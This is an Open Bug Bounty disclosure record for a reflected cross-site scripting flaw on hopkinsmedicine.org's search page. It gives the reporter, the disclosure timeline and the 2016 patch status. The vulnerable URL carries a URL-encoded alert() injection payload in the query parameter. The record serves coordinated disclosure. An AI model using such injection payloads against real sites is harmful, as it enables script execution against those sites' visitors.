hopkinsmedicine.org XSS vulnerability

2015-11-04T14:00:00
ID OBB:100756
Type openbugbounty
Reporter P4r4Bellum
Modified 2016-03-07T13:27:00

Description

Vulnerable URL:
http://www.hopkinsmedicine.org/search?form_instance=thincrust&client;=hopkinsmedicine_frontend&proxystylesheet;=hopkinsmedicine_frontend&output;=xml_no_dtd&site;=hopkinsmedicine_collection&q;=%22-alert%28%22XSSPOSED%22%29-%22%3E&btnG;=Search
Details:

Description| Value
---|---
Patched:| Yes, at 06.03.2016
Latest check for patch:| 06.03.2016 23:26 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 13372
Google Pagerank| 8
VIP website status:| Yes
Check hopkinsmedicine.org SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 4 November, 2015 14:00 GMT
Vulnerability existence verified and confirmed| 4 November, 2015 14:02 GMT
Vulnerability patched by the website owner| 7 March, 2016 13:27 GMT